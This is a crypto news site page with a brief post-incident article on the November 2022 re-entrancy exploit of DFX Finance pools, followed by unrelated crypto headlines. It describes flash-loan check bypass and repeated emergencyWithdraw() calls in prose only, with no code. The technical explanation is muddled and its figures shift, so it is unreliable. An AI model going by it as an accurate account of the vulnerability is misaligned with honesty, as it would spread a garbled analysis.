Cointime

Cointime

Download App
iOS & Android

DFX Finance Smart Contract Vulnerability Explained

Cointime Official

by Shashank

Overview:

On 11th November 2022, a Re-entrancy attack occurred, which resulted in draining a total of ~$7.5M from DFX Finance’s Polygon liquidity pools. The attacker could only transfer $4.3 million worth of assets into their wallet. The remaining portion–about $3.2 million– was extracted by an MEV bot in a front-running transaction, also called a sandwich attack.

Smart Contract Hack Overview:

  • Attacker’s address: 0x14c1
  • DFX Finance Code: 0x8888
  • MEV Bot Address & transaction: 0x6c6b
  • MEV Bot’s wallet address: 0xfde
  • Unconventional ordering transaction Block: 15941904
  • MEV Bot & wallet transaction address analysis: 0xfde0d

GitHub code link:

Decoding the Smart Contract Vulnerability:

Series of transactions connected to the wallet and MEV bot
DFX Finance Smart Contract Vulnerability
  • Because there was no outstanding amount at the attacker’s address, the transactions satisfied the validation when the transaction pair contract’s balance was checked, bypassing the necessity for transaction pair checks to pay back the flash loan. Link
  • The withdraw () function had a Re-entrancy protection modifier which could not be triggered since the flash loan was completed but the lptokens deposited by the attacker still existed in the lending contract, which actually belonged to the attacker, thus allowing an attacker to call the emergencyWithdraw() function any number of time until attacker withdraw all the deposited tokens.
  • Due to the MEV bots being activated, the attacker lost a significant amount of money to the owner of those bots and was only able to recover about $4M in stolen money.
smart contract
Comments

All Comments

Recommended for you

  • Australian Securities Exchange ASX approves its first spot Bitcoin ETF

    According to Bitcoin Magazine, the largest securities exchange in Australia, ASX, has approved its first spot Bitcoin ETF.

  • Layer3 Raises $15M in Series A Funding for Development of Omnichain Identity and Distribution Protocol

    Layer3, a company that has developed an omnichain identity and distribution protocol, has raised $15 million in Series A funding, bringing the total amount raised to $21.2 million. The funding round was led by ParaFi and Greenfield Capital, with participation from several other investors. Layer3 plans to use the funds to expand its operations and development efforts. The company's protocol allows for targeted and efficient distribution of tokens to users based on a variety of criteria, and has already been adopted by several crypto teams.

  • South Korean court receives new evidence that Do Kwon intended to deceive investors with fake transactions

    On June 17th, according to a report from Yonhap News Agency, there is evidence to suggest that Terraform Labs founder Do Kwon and Chai CEO Daniel Shin planned to deceive Terra investors from the beginning of Terraform Labs. Conversation records between Kwon and Shin show that Kwon told Shin he could generate fake transactions that looked real. In response, Shin said, "Let's experiment on a small scale first and see how it goes." These conversation records have been submitted as evidence to the court by the prosecutor's office in the country.

  • ALEX releases security incident update: The attacker's on-chain balance is approximately 5.56 million STX

    On June 17th, Bitcoin DeFi platform ALEX Lab released a security incident update. As of 11am on June 17th, the attacker had broadcasted over 9700 transactions, involving the creation of new wallet addresses and dispersing STX balances on the chain to these new wallets. The number of trackable transactions began to exponentially grow from 300 to over 9600 and has been accelerating without any signs of stopping. This also means that the attacker's independent address count has increased from less than 100 to over 4700 in 7 days.

  • South Korea to launch $14.5 million blockchain support program for public and private sectors

    The South Korean Ministry of Science and ICT and the Korea Internet & Security Agency (KISA) will jointly launch a blockchain support program in 2024. These two organizations plan to invest 20 billion Korean won (approximately $14.5 million) to develop public blockchain services and promote the commercialization of blockchain company products. The public blockchain projects supported by this program include digital coupons, digital badges, and online voting systems related to central bank digital currencies (CBDCs).

  • The total open interest of BTC contracts on the entire network is $34.729 billion

    Coinglass data shows that the total open position of BTC futures contracts on the network is 522,800 BTC, equivalent to approximately 34.729 billion US dollars.

  • South Korea’s New Reform Party Promises Stronger Measures Against Crypto Fraud

    On June 17th, the newly established right-wing political party in South Korea, the New Reform Party, announced plans to impose heavy penalties on those involved in financial fraud and scams, particularly individuals engaged in cryptocurrency fraud, housing contract fraud, and stock market manipulation.

  • The current authorized issuance volume of USDT on the TON chain has exceeded US$580 million

    The official transparency page of Tether, the stablecoin issuer, shows that the authorized issuance of USDT on the TON chain has exceeded $580 million and is still the sixth largest blockchain for USDT issuance, behind only Tron ($59.8 billion), Ethereum ($52 billion), Solana ($1.9 billion), Avalanche ($1.3 billion), and Omni ($888 million).

  • The US SEC rejected Ripple's request to reduce the fine, saying its settlement with Terraform Labs is not comparable

    On June 17th, the SEC criticized Ripple Labs' latest argument for reducing the fine and insisted on the proposed fine of nearly $2 billion. This includes $198.2 million in pre-judgment interest, $876.3 million in civil penalties, and another $876.3 million in disgorgement. The SEC stated that Ripple's fine should be based on the gross profit of its misconduct, not total sales. If Terraform's fine ratio (close to 12%) is applied to Ripple, its fine should be $102.6 million. The SEC believes that such a low fine cannot meet the purpose of civil penalty regulations. Since the SEC accused Ripple of selling unregistered securities in 2020, the two sides have been in a legal dispute. Judge Torres has confirmed Ripple's illegal behavior, but only when selling to institutional investors. Currently, the legal battle between the two sides is still ongoing.

  • The total amount of liquidation in the past 24 hours was 43.1 million US dollars

    According to Coinglass data, the total amount of liquidations in the past 24 hours was $43.1 million, with long positions liquidated at $24.02 million and short positions liquidated at $19.08 million. Of these, the amount of BTC liquidations was $4.88 million, ETH liquidations were $9.1 million, and NOT liquidations were $2.64 million.

Daily Must-Read

Popular Activities

Delysium $AGI & AI Private Yacht Party

Delysium $AGI & AI Private Yacht Party

March 27 - March 27
Seoul

Popular Tags

Cointime
News
Contents
RSS
Company